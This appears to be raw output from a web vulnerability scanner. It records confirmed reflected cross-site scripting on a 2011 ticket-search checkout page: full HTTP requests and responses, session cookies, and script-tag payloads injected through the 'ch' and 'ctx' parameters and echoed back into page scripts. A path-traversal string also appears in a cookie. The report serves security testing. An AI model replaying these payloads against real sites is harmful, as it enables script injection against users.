href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: -181883062, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape(''"--></style></script><script>netsparker(0x000016)</script>'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-181883062%3A1342566973901825%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100597%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET ></script><script>alert(9)</script>
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4At5RKaBjoLb2Zmc2V0af6QnQ%3D%3D--8d8a3ad9d414727939d36f2ee148d08a011bd46b; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100699
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 133
ETag: "d77d768858fec18d99b84238a1bc5380"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: lvd=1311100713; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:38:33 GMT,_fancat_session=BAh7FDoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AQcRqaBjoLb2Zmc2V0af6QnToLc3JjX2lkaQIAAToHbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9JTNFJTNDL3NjcmlwdCUzRSUzQ3NjcmlwdCUzRW5ldHNwYXJrZXIoOSklM0Mvc2NyaXB0JTNFJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzBjsIRjoNdmlzaXRfaWRp%2FBMp%2Bsk6D3Zpc2l0b3JfaWQiFTEzNDI1NjcwMDIxMDY4ODE6DnN0eWxlX2lkc0kiAAY7CEY6CGxvY3sKOw5mGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDsPZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOxBpEjsRIhZEYWxsYXMtRm9ydCBXb3J0aDsSQBY%3D--3d5d09137a0dddb0b3ccb265c860b87eb9f64b9a; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3647
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | FanSnap - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | FanSnap - Ticket Search</title><link href="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-fs-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.fansnap.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-fs-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to FanSnap in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned FanSnap in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'fs', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: -906352365, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, true, "fansnap.com");//]]></script><script src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: '></script><script>netsparker(9)</script>', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script><script type='text/javascript'> //<![CDATA[ _uacct = "UA-4075898-1"; _udn = "fansnap.com"; urchinTracker(); //]]></script><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-906352365%3A1342567002106881%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100713%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET ></script><script>alert(9)</script>
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4At5RKaBjoLb2Zmc2V0af6QnQ%3D%3D--8d8a3ad9d414727939d36f2ee148d08a011bd46b; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100699
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 730
ETag: "338667f0d4cbcec8bffc8ef27c745d4b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: lvd=1311100713; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:38:33 GMT,_fancat_session=BAh7FToPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25